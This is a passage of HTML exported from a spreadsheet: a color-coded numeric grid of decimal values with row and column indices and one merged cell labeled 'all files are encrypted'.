overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">2</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":3}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">3</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":4}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">4</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":5}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">5</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":6}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">6</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":7}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">7</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":8}" style="background-color: #ea9999; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">8</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":9}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">9</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":10}" style="background-color: #c9daf8; border-color: rgb(204, 204, 204) rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">10</td></tr><tr style="height: 21px;"><td data-sheets-value="{"1":3,"3":0}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":3.742632}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.742632</td><td data-sheets-value="{"1":3,"3":0.787156}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.787156</td><td data-sheets-value="{"1":3,"3":0.50037}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.50037</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.007811}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.007811</td><td data-sheets-value="{"1":3,"3":0.119928}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.119928</td><td data-sheets-value="{"1":3,"3":2.686471}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">2.686471</td><td data-sheets-value="{"1":3,"3":1.771443}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.771443</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td colspan="1" data-sheets-value="{"1":2,"2":"all files are encrypted"}" rowspan="16" style="border-color: rgb(204, 204, 204) rgb(0, 0, 0) rgb(0, 0, 0) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; font-family: Calibri; font-size: 18pt; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: middle;"><div style="max-height: 336px;">all files are encrypted</div></td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":1}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">1</td><td data-sheets-value="{"1":3,"3":7.105196}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">7.105196</td><td data-sheets-value="{"1":3,"3":1.013578}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.013578</td><td data-sheets-value="{"1":3,"3":1.252902}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.252902</td><td data-sheets-value="{"1":3,"3":0.625865}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.625865</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":5.491767}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.491767</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.110781}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.110781</td><td data-sheets-value="{"1":3,"3":0.020577}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.020577</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":2}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">2</td><td data-sheets-value="{"1":3,"3":7.545032}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">7.545032</td><td data-sheets-value="{"1":3,"3":3.370516}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.370516</td><td data-sheets-value="{"1":3,"3":1.118979}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.118979</td><td data-sheets-value="{"1":3,"3":0.296561}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.296561</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.170941}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.170941</td><td data-sheets-value="{"1":3,"3":0.170201}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.170201</td><td data-sheets-value="{"1":3,"3":0.147976}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.147976</td><td data-sheets-value="{"1":3,"3":0.215866}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.215866</td><td data-sheets-value="{"1":3,"3":0.763711}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.763711</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":3}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">3</td><td data-sheets-value="{"1":3,"3":6.681859}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">6.681859</td><td data-sheets-value="{"1":3,"3":1.036887}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.036887</td><td data-sheets-value="{"1":3,"3":1.431128}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.431128</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.178761}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.178761</td><td data-sheets-value="{"1":3,"3":0.10031}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.10031</td><td data-sheets-value="{"1":3,"3":0.526232}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.526232</td><td data-sheets-value="{"1":3,"3":0.019609}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.019609</td><td data-sheets-value="{"1":3,"3":0.1805}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.1805</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":4}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">4</td><td data-sheets-value="{"1":3,"3":3.948145}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.948145</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.231532}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.231532</td><td data-sheets-value="{"1":3,"3":0.120758}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.120758</td><td data-sheets-value="{"1":3,"3":0.790898}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.790898</td><td data-sheets-value="{"1":3,"3":0.599471}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.599471</td><td data-sheets-value="{"1":3,"3":0.871498}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.871498</td><td data-sheets-value="{"1":3,"3":0.483216}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.483216</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":5}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">5</td><td data-sheets-value="{"1":3,"3":5.816442}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.816442</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.158697}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.158697</td><td data-sheets-value="{"1":3,"3":0.693802}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.693802</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.778738}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.778738</td><td data-sheets-value="{"1":3,"3":0.715084}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.715084</td><td data-sheets-value="{"1":3,"3":0.205816}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.205816</td><td data-sheets-value="{"1":3,"3":0.029846}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.029846</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":6}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">6</td><td data-sheets-value="{"1":3,"3":3.734055}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.734055</td><td data-sheets-value="{"1":3,"3":8.923577}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">8.923577</td><td data-sheets-value="{"1":3,"3":2.616297}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">2.616297</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.747448}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.747448</td><td data-sheets-value="{"1":3,"3":0.252802}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.252802</td><td data-sheets-value="{"1":3,"3":0.236518}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.236518</td><td data-sheets-value="{"1":3,"3":0.020577}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.020577</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":7}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">7</td><td data-sheets-value="{"1":3,"3":7.022468}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">7.022468</td><td data-sheets-value="{"1":3,"3":0.056858}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.056858</td><td data-sheets-value="{"1":3,"3":1.931174}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.931174</td><td data-sheets-value="{"1":3,"3":0.563466}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.563466</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.003211}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.003211</td><td data-sheets-value="{"1":3,"3":0.213173}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.213173</td><td data-sheets-value="{"1":3,"3":0.198259}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.198259</td><td data-sheets-value="{"1":3,"3":0.377146}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.377146</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":8}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">8</td><td data-sheets-value="{"1":3,"3":4.158711}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">4.158711</td><td data-sheets-value="{"1":3,"3":0.963861}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.963861</td><td data-sheets-value="{"1":3,"3":1.045184}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.045184</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.459586}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.459586</td><td data-sheets-value="{"1":3,"3":0.590549}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.590549</td><td data-sheets-value="{"1":3,"3":0.028423}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.028423</td><td data-sheets-value="{"1":3,"3":0.28698}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.28698</td><td data-sheets-value="{"1":3,"3":0.01805}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.01805</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":9}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">9</td><td data-sheets-value="{"1":3,"3":5.872631}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.872631</td><td data-sheets-value="{"1":3,"3":0.463353}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.463353</td><td data-sheets-value="{"1":3,"3":0.387103}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.387103</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.524341}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.524341</td><td data-sheets-value="{"1":3,"3":1.143632}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.143632</td><td data-sheets-value="{"1":3,"3":0.358465}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.358465</td><td data-sheets-value="{"1":3,"3":0.771859}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.771859</td><td data-sheets-value="{"1":3,"3":0.112953}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.112953</td><td data-sheets-value="{"1":3,"3":0.119148}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.119148</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":10}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">10</td><td data-sheets-value="{"1":3,"3":5.959267}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.959267</td><td data-sheets-value="{"1":3,"3":0.9285}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.9285</td><td data-sheets-value="{"1":3,"3":8.530923}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">8.530923</td><td data-sheets-value="{"1":3,"3":1.739734}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.739734</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.55761}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.55761</td><td data-sheets-value="{"1":3,"3":0.141551}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.141551</td><td data-sheets-value="{"1":3,"3":0.244138}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.244138</td><td data-sheets-value="{"1":3,"3":0.172354}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.172354</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":11}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">11</td><td data-sheets-value="{"1":3,"3":6.141237}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; 